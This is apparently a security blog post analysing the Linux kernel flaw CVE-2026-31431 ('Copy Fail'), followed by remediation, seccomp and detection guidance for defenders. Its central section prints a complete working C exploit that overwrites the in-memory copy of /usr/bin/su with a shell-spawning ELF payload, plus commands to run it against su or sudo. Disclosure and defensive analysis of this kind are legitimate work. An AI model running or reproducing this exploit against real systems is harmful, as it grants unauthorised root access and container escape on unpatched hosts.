CopyFail (CVE-2026-31431): A 4-Byte Page Cache Write That Gives You Root
May 1, 2026
Author

Ravindu Wickramasinghe
@rvz

CVE-2026-31431 - A logic bug in the Linux kernel that lets any unprivileged user silently modify the in-memory copy of any readable file, including setuid binaries like /usr/bin/su. Replace su's code in memory with a payload that calls setuid(0) + execve("/bin/sh"), run su, get root. No race condition, no kernel offsets, no recompilation. Works on most major distros since 2017.
Discovered by Xint Code / Theori. This post breaks down the root cause and how the exploit actually works.
Why This One Is Different
Linux kernel privilege escalations aren't new. Dirty COW (CVE-2016-5195) needed a race condition in copy-on-write and could destabilize the system. Dirty Pipe (CVE-2022-0847) was deterministic but only affected kernels from 5.8 until the fixes in 5.16.11, 5.15.25, and 5.10.102, and required precise pipe buffer state manipulation.
Copy Fail is none of that. It's a deterministic logic flaw. No race to win, no system crash risk. Any kernel from 4.14 (released November 2017) onward with the algif_aead module available is affected. The same exploit binary works across Ubuntu, RHEL, Amazon Linux, SUSE, and most other distros without modification.
The short version: Linux has a feature called AF_ALG that lets any user access the kernel's crypto operations through a socket. There's also splice(), a syscall that moves file data between file descriptors without copying it - it just passes references to the kernel's in-memory copy of the file (the page cache). And there's authencesn, a crypto algorithm that writes 4 bytes into the destination buffer's tag region as part of its sequence number handling — harmless when the destination is a normal buffer, catastrophic when page cache pages end up in it.
Chain these three together: splice a file's page cache pages into an AF_ALG crypto socket, trigger the authencesn bug, and those 4 bytes land directly in the kernel's cached copy of the file. You control which file, which offset, and which 4 bytes. That's an arbitrary write to any readable file's in-memory copy - game over.
Exploit flow: AF_ALG socket, splice, authencesn scratch write, execve
The Three Ingredients
To understand Copy Fail, you need three pieces. Each one is harmless alone. The vulnerability only exists at their intersection.
1. AF_ALG - Kernel Crypto for Everyone
AF_ALG is a socket type (socket family 38) that exposes the kernel's crypto API to unprivileged userspace. Think of it like opening a raw socket, but instead of networking, you get access to kernel crypto operations. Any user can open one, bind it to an AEAD template like authencesn(hmac(sha256),cbc(aes)), and run encryption or decryption. No capabilities needed. AEAD stands for Authenticated Encryption with Associated Data - it's a crypto mode that encrypts data and verifies integrity in one operation, commonly used in IPsec and TLS.
# Open an AF_ALG socket - no privileges required
import socket
a = socket.socket(38, 5, 0)  # AF_ALG, SOCK_SEQPACKET
a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

2. splice() - Zero-Copy File I/O
First, a quick note on the page cache: when Linux reads a file from disk, it keeps a copy in memory so future reads are fast. This in-memory copy is the page cache. When you run execve() on a binary, the kernel loads it from the page cache, not from disk. Every process on the system sees the same cached pages.
splice() transfers data between file descriptors and pipes without copying. Normally when you read() a file, the kernel copies data from the page cache into your userspace buffer. splice() skips that copy - it passes page cache pages by reference. The destination gets pointers to the exact same physical pages that back every read(), mmap(), and execve() of that file.
When you splice a file into an AF_ALG socket, the socket's input scatterlist (a kernel data structure that describes a list of memory regions for DMA/crypto operations) holds direct references to the kernel's cached pages. This is the efficiency optimization that makes the bug possible.
3. authencesn - The One That Breaks the Rules
authencesn is an AEAD wrapper used by IPsec for Extended Sequence Numbers. The details of why it exists don't matter much here - what matters is what it does wrong.
During decryption, authencesn needs to shuffle sequence number bytes for its HMAC calculation. To do this, it uses the destination buffer as scratch space, writing 4 bytes (seqno_lo - the low 4 bytes of the extended sequence number) at offset assoclen + cryptlen in the destination scatterlist. This is normal for authencesn — when the destination is a kernel-allocated buffer (as in IPsec's xfrm layer), the write lands in memory the algorithm owns. The problem is when the destination scatterlist contains pages it shouldn't — like page cache pages from splice().
// Inside crypto_authenc_esn_decrypt():
scatterwalk_map_and_copy(tmp, dst, 0, 8, 0);                        // read AAD bytes 0-7
scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);                        // overwrite dst[4..7]
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);  // WRITE PAST BOUNDARY
//                                     ^^^^^^^^^^^^^^^^^^^
// This writes into memory the algorithm doesn't own

Most AEAD algorithms in the kernel only read the tag region during decryption. GCM, CCM, and regular authenc all confine writes to the legitimate output area. authencesn is unusual in that it treats the destination as a read-write scratch buffer, writing into the tag region as part of its sequence number manipulation.
The Root Cause: Page Cache Pages in the Writable Scatterlist
In 2017, an optimization was added to algif_aead.c (commit 72548b093ee3) to perform AEAD operations in-place. Before this, the input scatterlist (req->src, where the data comes from) and the output scatterlist (req->dst, where results go) were separate. Page cache pages from splice lived in src (read-only). The user's buffer was in dst (writable). Safe.
The optimization changed this: it copied the data portion from input to output, but linked the authentication tag pages by reference using sg_chain() (a kernel function that connects two scatterlists so they appear as one continuous memory region). Then it passed the same scatterlist as both source and destination to aead_request_set_crypt() - making the operation in-place. Now page cache pages from splice() were part of the writable destination scatterlist.
Scatterlist layout before and after the 2017 in-place optimization
When authencesn writes its 4-byte seqno_lo at dst[assoclen + cryptlen], the write crosses from the user's buffer into the linked page cache pages. The kernel walks through the combined scatterlist, maps the page cache page into memory, and writes directly into the cached copy of the target file.
The HMAC check then runs and fails (the ciphertext is fabricated), so recvmsg() returns an error. But the 4-byte write persists. The original bytes are never restored.
What the Attacker Controls
This isn't just a corruption primitive. The attacker has precise control over three things:
- Which file: Any file readable by the current user. The attacker splices the target file into the AF_ALG socket.
- Which offset: The splice offset, splice length, and assoclen (the associated data length parameter passed to the AEAD operation) determine exactly which 4 bytes within the file's page cache get overwritten.
- Which value: The 4-byte overwrite value comes from bytes 4-7 of the AAD, constructed by the attacker in sendmsg().
Controlled file + controlled offset + controlled value = arbitrary 4-byte write to the page cache of any readable file. That's a game-ending primitive.
The Exploit: From Logic Bug to Root Shell
The default exploit path targets /usr/bin/su, a setuid-root binary present on most Linux distros. The exploit replaces the beginning of su in the page cache with a minimal 160-byte ELF binary that does setuid(0) + execve("/bin/sh"), then runs su to trigger it.
Step 1: Open the AF_ALG Socket
Bind to authencesn(hmac(sha256),cbc(aes)), set a key, accept a request socket. No privileges needed. AF_ALG is available to unprivileged users by default on most distros that ship algif_aead as a built-in or autoloaded module.
Step 2: Construct the Write
For each 4-byte chunk of the ELF payload, construct a sendmsg() + splice() pair. The sendmsg provides the AAD where bytes 4-7 carry the 4 bytes to write. The splice feeds the target file's page cache pages as ciphertext and tag.
Step 3: Trigger the Write
recv() triggers the decrypt operation. Inside authencesn, the kernel writes seqno_lo at dst[assoclen + cryptlen]. The scatterwalk crosses into the page cache. Four bytes are written. HMAC fails. recvmsg returns an error. The page cache is corrupted.
Step 4: Get Root
After all payload chunks are written, run su. The kernel loads the binary from the page cache, which now contains the minimal ELF payload instead of the real su binary. Because su is setuid-root, the payload's setuid(0) + execve("/bin/sh") runs as root.
Use responsibly. Run only on systems you own or have written authorization to test. This corrupts the page cache of a setuid binary. The resulting root shell is real.
The Exploit Code
Below is a C implementation of the exploit (source on GitHub, also available in Python). The payload is a 160-byte minimal ELF binary (extracted from Theori's published PoC) that replaces /usr/bin/su from byte 0 in the page cache. It doesn't inject shellcode at a specific offset - it overwrites the entire ELF header and entry point so the kernel's ELF loader executes setuid(0) + execve("/bin/sh") when su is run. This is why it works across distros without per-binary offsets. Verified on Ubuntu 24.04 LTS, kernel 6.17.0-1012-aws.
#define _GNU_SOURCE#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <fcntl.h>#include <sys/socket.h>#include <linux/if_alg.h>
#define SOL_ALG 279#define TARGET "/usr/bin/su"
// minimal ELF: setuid(0) + execve("/bin/sh")// overwrites the target binary from byte 0 in the page cacheunsigned char payload[] = { 0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00, 0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00, 0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0x9e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x9e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00, 0x31,0xc0,0x31,0xff,0xb0,0x69,0x0f,0x05, 0x48,0x8d,0x3d,0x0f,0x00,0x00,0x00,0x31, 0xf6,0x6a,0x3b,0x58,0x99,0x0f,0x05,0x31, 0xff,0x6a,0x3c,0x58,0x0f,0x05,0x2f,0x62, 0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,};
// write 4 bytes into the page cache at the given offsetvoid write4(int fd, int offset, void *value) { struct sockaddr_alg sa = { AF_ALG, "aead", 0, 0, "authencesn(hmac(sha256),cbc(aes))" };
int af = socket(AF_ALG, SOCK_SEQPACKET, 0); bind(af, (void *)&sa, sizeof sa);
// dummy key - the value doesn't matter, HMAC will fail anyway char key[40] = {8, 0, 1, 0, 0, 0, 0, 16}; setsockopt(af, SOL_ALG, ALG_SET_KEY, key, 40); setsockopt(af, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4);
int req = accept(af, 0, 0); int n = offset + 4;
// AAD bytes 4-7 become seqno_lo - this is what gets written to the page cache unsigned char aad[8] = {0x41, 0x41, 0x41, 0x41}; memcpy(aad + 4, value, 4);
// cmsg headers configure the AEAD operation unsigned char op[4] = {0}; // ALG_OP_DECRYPT unsigned char iv[20] = {0x10}; // ivlen=16, 16 zero bytes unsigned char al[4] = {8}; // assoclen=8
struct iovec iov = {aad, 8}; char cbuf[CMSG_SPACE(4) + CMSG_SPACE(20) + CMSG_SPACE(4)]; memset(cbuf, 0, sizeof cbuf); struct msghdr msg = {.msg_iov = &iov, .msg_iovlen = 1, .msg_control = cbuf, .msg_controllen = sizeof cbuf};
struct cmsghdr *cm = CMSG_FIRSTHDR(&msg); cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_OP; cm->cmsg_len = CMSG_LEN(4); memcpy(CMSG_DATA(cm), op, 4);
cm = CMSG_NXTHDR(&msg, cm); cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_IV; cm->cmsg_len = CMSG_LEN(20); memcpy(CMSG_DATA(cm), iv, 20);
cm = CMSG_NXTHDR(&msg, cm); cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_AEAD_ASSOCLEN; cm->cmsg_len = CMSG_LEN(4); memcpy(CMSG_DATA(cm), al, 4);
sendmsg(req, &msg, MSG_MORE);
// splice page cache pages into the crypto scatterlist (zero-copy) int p[2]; pipe(p); splice(fd, &(loff_t){0}, p[1], 0, n, 0); splice(p[0], 0, req, 0, n, 0);
// trigger decrypt - HMAC fails but the 4-byte write already landed char buf[4096]; recv(req, buf, 8 + offset, 0);
close(p[0]); close(p[1]); close(req); close(af);}
int main() { int chunks = (sizeof(payload) + 3) / 4;
printf("[*] CVE-2026-31431 - Copy Fail\n"); printf("[*] target: %s\n", TARGET); printf("[*] payload: %zu byte ELF (setuid(0) + execve('/bin/sh'))\n", sizeof(payload));
// check if AF_ALG + authencesn is available int test = socket(AF_ALG, SOCK_SEQPACKET, 0); if (test < 0) { printf("[!] AF_ALG not available - kernel may be patched or module not loaded\n"); return 1; } struct sockaddr_alg tsa = { AF_ALG, "aead", 0, 0, "authencesn(hmac(sha256),cbc(aes))" }; if (bind(test, (void *)&tsa, sizeof tsa) < 0) { printf("[!] authencesn bind failed - module not loaded\n"); close(test); return 1; } close(test); printf("[*] AF_ALG + authencesn available - system is vulnerable\n");
int fd = open(TARGET, O_RDONLY); if (fd < 0) { perror("[!] open failed"); return 1; } printf("[*] opened %s (fd=%d)\n", TARGET, fd);
for (int i = 0; i < (int)sizeof(payload); i += 4) { write4(fd, i, payload + i); printf("[+] wrote 4 bytes to page cache at offset %d (%d/%d)\n", i, i/4 + 1, chunks); }
close(fd); printf("[*] page cache corrupted. executing %s...\n", TARGET); system("su");}gcc -o copy_fail copy_fail.c && ./copy_fail
PoC exploit running on Ubuntu 24.04 LTS, kernel 6.17.0-1012-aws
Page cache corruption path - disk stays clean, only the cached copy is modified
The Stealth Factor
The corrupted page is never marked dirty for writeback. The kernel's normal writeback machinery doesn't know the page was modified. This means:
- The file on disk remains unchanged
- Tools like sha256sum read through the page cache, so they show the corrupted hash, not the clean on-disk copy. Only direct I/O (dd iflag=direct) bypasses the cache and reveals the untouched original
- Every read(), mmap(), and execve() on the file serves the corrupted page cache version
- The corruption persists until the page is evicted from cache or the system reboots
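Because the tampered pages are clean from the kernel's point of view, eviction can be requested explicitly instead of waiting for memory pressure or a reboot. The following is a minimal recovery sketch using posix_fadvise(POSIX_FADV_DONTNEED); the function name evict_from_page_cache is an assumption made for illustration, and pages that are currently mapped by a running process may not be dropped by this call.

```python
import os


def evict_from_page_cache(path: str) -> None:
    """Ask the kernel to drop cached pages for `path` (hypothetical helper).

    The request is advisory. On Linux it typically drops clean, unmapped
    pages, so the next read is served from disk again.
    """
    fd = os.open(path, os.O_RDONLY)
    try:
        # offset=0 and length=0 together mean "the whole file".
        os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
    finally:
        os.close(fd)
```

Calling evict_from_page_cache("/usr/bin/su") only needs read access to the file. It is worth re-checking the file's hash afterwards rather than assuming the eviction happened.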
The page cache is also shared across the host. This means the corruption is visible to every process, including those in other containers. Copy Fail isn't just a local privilege escalation - it's a container escape primitive.
How This Stayed Hidden for 9 Years
The bug is a collision of three independent changes, each reasonable in isolation:
- 2011: authencesn added for IPsec ESN support. Uses destination buffer as scratch space. Harmless at the time - the only caller was the kernel's internal xfrm layer.
- 2015: AF_ALG gains AEAD support with a splice() path. But it uses out-of-place operation - req->src and req->dst are separate. Page cache pages are in src (read-only). Not yet exploitable.
- 2017: The in-place optimization. sg_chain() links page cache tag pages into the writable destination. req->src = req->dst. Now authencesn's scratch write crosses into page cache pages. The bug is born.
Nobody connected the 2017 in-place optimization to authencesn's scratch writes or to the splice path's use of page cache pages. The vulnerability exists at the intersection of all three, and was silently exploitable for nearly a decade.
Impact
The algif_aead module ships enabled in most major distro default kernel configs. The attack requires only an unprivileged local user account. Distros that don't build or autoload algif_aead are not affected.
| Environment | Risk | Impact |
|---|---|---|
| Multi-tenant hosts, jump boxes | High | Any user becomes root |
| Kubernetes / container clusters | High | Cross-container, cross-tenant escape |
| CI runners (GitHub Actions, GitLab) | High | A PR becomes root on the runner |
| Single-tenant servers | Medium | Internal LPE, chains with RCE |
| Single-user workstations | Lower | Post-exploitation step-up |
The Fix
The patch reverts algif_aead.c to out-of-place operation, removing the 2017 in-place optimization entirely. The input (req->src) now points to the source scatterlist where page cache pages live (read-only), and the output (req->dst) points to the user's receive buffer (writable, but no page cache pages). The sg_chain linking is removed entirely.
// Before (vulnerable): input and output point to the same scatterlist
aead_request_set_crypt(&areq->cra_u.aead_req,
                       rsgl_src,                      // input (aliases the output scatterlist)
                       areq->first_rsgl.sgl.sgt.sgl,  // output scatterlist (same!)
                       used, ctx->iv);

// After (fixed): input and output are separate
aead_request_set_crypt(&areq->cra_u.aead_req,
                       tsgl_src,                      // input (page cache pages - read only)
                       areq->first_rsgl.sgl.sgt.sgl,  // output (user buffer - writable)
                       used, ctx->iv);

As the commit message puts it: "There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings."
Remediation
Patch your kernel. Update your distribution's kernel package to one that includes mainline commit a664bf3d603d. Most major distributions are shipping the fix now.
If you can't patch yet, disable the algif_aead module:
# Disable the vulnerable module
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null

What does this break? For most systems - nothing. AF_ALG is a userspace front door to the kernel crypto API. In-kernel consumers like dm-crypt, kTLS, and IPsec call the crypto API directly without going through AF_ALG. Userspace tools like OpenSSL and SSH use their own crypto libraries by default. None of them depend on AF_ALG.
The only things affected are applications explicitly configured to use AF_ALG - like OpenSSL with the afalg engine enabled. Check with lsmod | grep algif (a nonzero reference count means something is actively using it).
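To confirm the mitigation took effect, it helps to check both the module state and whether an unprivileged process can still reach authencesn through AF_ALG. The sketch below does both; the function names are assumptions made for illustration. Note that the bind probe can itself trigger module autoloading, so it is best run after the modprobe.d rule is in place, where a False result is the desired outcome.

```python
import socket

ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"


def algif_aead_refcount(modules_path="/proc/modules"):
    """Return the algif_aead reference count, or None if it is not listed.

    None also covers a built-in module (not shown in /proc/modules) and
    kernels that report "-" instead of a number in the refcount column.
    """
    try:
        with open(modules_path) as f:
            for line in f:
                fields = line.split()
                if len(fields) >= 3 and fields[0] == "algif_aead":
                    return int(fields[2]) if fields[2].isdigit() else None
    except OSError:
        return None
    return None


def authencesn_reachable():
    """Return True if this process can bind an AF_ALG socket to authencesn."""
    af_alg = getattr(socket, "AF_ALG", 38)  # 38 is the value used in this post
    try:
        with socket.socket(af_alg, socket.SOCK_SEQPACKET, 0) as s:
            s.bind(("aead", ALG_NAME))
        return True
    except OSError:
        return False
```

A nonzero value from algif_aead_refcount() suggests something is actively using the module, and authencesn_reachable() returning False after the change suggests the interface is no longer exposed to that user.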
For container/sandbox environments, block AF_ALG socket creation via seccomp regardless of patch state.
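As an illustration of what such a seccomp rule can look like, the sketch below generates a profile in the JSON format accepted by Docker and other OCI runtimes, denying socket() when the first argument is AF_ALG (38). This is an assumption-laden example and not the profile produced by any particular tool: it uses a default-allow policy for brevity, whereas a real deployment would more likely start from the runtime's default profile, and it does not cover the legacy socketcall() multiplexer used by 32-bit x86 binaries. The output filename is hypothetical.

```python
import json

AF_ALG = 38  # socket family number for AF_ALG


def af_alg_deny_profile():
    """Build a seccomp profile dict that fails socket(AF_ALG, ...) with an errno."""
    return {
        "defaultAction": "SCMP_ACT_ALLOW",  # brevity only; not a hardened default
        "syscalls": [
            {
                "names": ["socket"],
                "action": "SCMP_ACT_ERRNO",
                "args": [
                    # Match when argument 0 (the address family) equals AF_ALG.
                    {"index": 0, "value": AF_ALG, "op": "SCMP_CMP_EQ"}
                ],
            }
        ],
    }


def write_profile(path):
    """Write the profile as JSON to `path`."""
    with open(path, "w") as f:
        json.dump(af_alg_deny_profile(), f, indent=2)
```

After write_profile("af_alg_deny.json"), the file can be passed to a container with docker run --security-opt seccomp=af_alg_deny.json.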
Detection: Finding Page Cache Tampering
The exploit's stealth comes from the page cache being volatile — the corrupted pages are never marked dirty for writeback, so the file on disk stays clean. sha256sum /usr/bin/su reads from the page cache, so it returns the corrupted hash. Standard file integrity tools like AIDE or Tripwire also read via the page cache, meaning they'd see the corruption — but only if they re-check after exploitation, not by comparing to on-disk state.
The reliable detection technique is comparing a buffered read against a direct I/O read of the same file. Direct I/O (O_DIRECT) bypasses the page cache entirely and reads raw blocks from disk:
# Buffered read (goes through page cache - shows corrupted content)
sha256sum /usr/bin/su
# → 44900c63... (WRONG - this is the injected ELF)

# Direct I/O read (bypasses page cache - reads from disk)
dd if=/usr/bin/su bs=4096 iflag=direct 2>/dev/null | sha256sum
# → c74311fe... (CORRECT - the real binary)

# If these two differ → page cache has been tampered with

This divergence is the smoking gun. For static binaries like setuid executables, buffered and direct I/O reads always produce identical hashes under normal operations. A mismatch means something wrote to the page cache without going through the filesystem - exactly what Copy Fail does. (Caveat: on btrfs, O_DIRECT reads on compressed extents fall back to buffered I/O, which would produce a false negative. ext4 and XFS handle O_DIRECT correctly.)
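The same comparison can be scripted for use in monitoring. The sketch below hashes a file once through the page cache and once with O_DIRECT, using an anonymous mmap as the page-aligned buffer that direct I/O requires. The function names and the "unknown" verdict are assumptions made for this example; filesystems that reject O_DIRECT (some tmpfs or overlay setups, for instance) end up in the "unknown" branch rather than producing a false result.

```python
import hashlib
import mmap
import os


def sha256_buffered(path):
    """Hash the file through normal buffered reads (served from the page cache)."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sha256_direct(path, block_size=1 << 20):
    """Hash the file with O_DIRECT reads, bypassing the page cache."""
    fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    try:
        size = os.fstat(fd).st_size
        digest = hashlib.sha256()
        # An anonymous mmap is page-aligned, which O_DIRECT needs.
        with mmap.mmap(-1, block_size) as buf:
            done = 0
            while done < size:
                n = os.readv(fd, [buf])
                if n == 0:
                    break
                digest.update(buf[:n])
                done += n
        return digest.hexdigest()
    finally:
        os.close(fd)


def page_cache_verdict(path):
    """Return "match", "MISMATCH", or "unknown" if direct I/O is unavailable."""
    buffered = sha256_buffered(path)
    try:
        direct = sha256_direct(path)
    except OSError:
        return "unknown"
    return "match" if buffered == direct else "MISMATCH"
```

Running page_cache_verdict("/usr/bin/su") on a schedule and alerting on "MISMATCH" would be one way to use it. The btrfs caveat above applies here as well.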
We verified this on AWS (Ubuntu 24.04, kernel 6.17.0-1012-aws). Before exploitation, both hashes match. After running the PoC, the buffered hash diverges while the direct I/O hash remains the original:
# Before exploitation - hashes match
$ sha256sum /usr/bin/su
c74311fe5636...  /usr/bin/su
$ dd if=/usr/bin/su bs=4096 iflag=direct 2>/dev/null | sha256sum
c74311fe5636...  -

# After exploitation - page cache corrupted
$ sha256sum /usr/bin/su
44900c631391...  /usr/bin/su    ← CORRUPTED (page cache)
$ dd if=/usr/bin/su bs=4096 iflag=direct 2>/dev/null | sha256sum
c74311fe5636...  -    ← CLEAN (disk)

Other detection vectors worth monitoring:
- Package integrity: debsums -c (Debian/Ubuntu) or rpm -V (RHEL) will report the binary as modified since they read via the page cache and compare against the package database hash
- AF_ALG socket creation: an auditd rule on socket(AF_ALG) will fire - this syscall is extremely rare on most systems since the kernel crypto API consumers (dm-crypt, IPsec, kTLS) don't use AF_ALG
- Behavioral: unprivileged user suddenly holding a uid=0 shell. EDR/auditd catches the setuid(0) + execve sequence from a process that shouldn't do that
- Memory forensics: LiME + Volatility can inspect page cache pages directly and find the injected ELF payload in memory
What won't catch it: filesystem audit logs (no disk write occurred), file timestamps (stat shows no change), and standard kernel logs (no warnings generated by default).
Tooling
We've released three tools alongside the PoC in the GitHub repository:
Improved PoC (copy_fail.c / copy_fail.py)
The updated exploit adds responsible defaults that the original lacked:
- --cleanup: evicts the corrupted page cache after exploitation via posix_fadvise(POSIX_FADV_DONTNEED), restoring the clean on-disk binary. FADV_DONTNEED is technically advisory, but on Linux it actively evicts clean (non-dirty) pages, which is exactly what the corrupted pages are, since the kernel never marks them dirty
- --check-only: tests if the system is vulnerable without actually exploiting it
- --target PATH: test against a different setuid binary
- Signal handlers: SIGINT/SIGTERM trigger page cache eviction if interrupted mid-exploit (SIGKILL cannot be caught; use echo 3 > /proc/sys/vm/drop_caches to recover in that case)
- Forensic warnings: post-exploitation output explaining what artifacts remain
# Check vulnerability without exploiting
./copy_fail --check-only

# Exploit with automatic cleanup (restores clean binary after shell exits)
./copy_fail --cleanup

# Target a different binary
./copy_fail --cleanup --target /usr/bin/sudo

Mitigation Script (copyfail_mitigate.sh)
Smart patching automation that assesses before acting:
- Detects if the system is vulnerable (kernel version + AF_ALG module check)
- Enumerates processes currently using AF_ALG sockets — so you can decide if it's safe to disable
- Recommends patched kernel versions per distro (Ubuntu, RHEL, Amazon Linux, Debian, SUSE)
- Applies mitigation: blacklists algif_aead via modprobe.d and unloads the module
- Generates a seccomp profile for blocking AF_ALG in containers
- --dry-run mode to preview changes without applying
# Preview what the script would do
sudo bash copyfail_mitigate.sh --dry-run

# Apply mitigation (interactive confirmation)
sudo bash copyfail_mitigate.sh

# Auto-apply without prompts
sudo bash copyfail_mitigate.sh --yes

# Generate seccomp profile for containers
bash copyfail_mitigate.sh --seccomp

Detection Script (copyfail_detect.sh)
Checks for active or past exploitation:
- Page cache integrity: compares buffered vs direct I/O hashes for setuid binaries
- AF_ALG activity: checks for loaded module, active sockets, and socket-holding processes
- Package integrity: runs debsums / rpm -V against target binaries
- Process lineage: scans for suspicious root shells spawned from unexpected parents
# Check /usr/bin/su only
sudo bash copyfail_detect.sh

# Check all common setuid binaries
sudo bash copyfail_detect.sh --all --verbose

All tools are available in the repository. Tested on Ubuntu 24.04 LTS (kernel 6.17.0-1012-aws) on AWS EC2.
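For readers who want to build their own sweep instead of using the script, the first step is a list of setuid binaries to check. The sketch below walks a set of directories and returns regular files with the setuid bit set. It is not how copyfail_detect.sh is implemented; the function name and the default directory list are assumptions chosen for illustration.

```python
import os
import stat


def find_setuid_files(roots=("/usr/bin", "/usr/sbin", "/bin", "/sbin")):
    """Return sorted paths of regular files under `roots` with the setuid bit set."""
    found = set()
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: do not follow symlinks
                except OSError:
                    continue  # vanished or unreadable entry
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.add(path)
    return sorted(found)
```

Each returned path can then be fed to a buffered versus direct I/O hash comparison, with any mismatch treated as a candidate for investigation.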
References
- copy.fail - Official disclosure page
- Xint Code write-up - Full technical deep-dive by the researchers
- GitHub PoC repository - Exploit source and issue tracker
- Kernel patch - Mainline fix commit
- 72548b093ee3 - The 2017 in-place optimization that introduced the bug
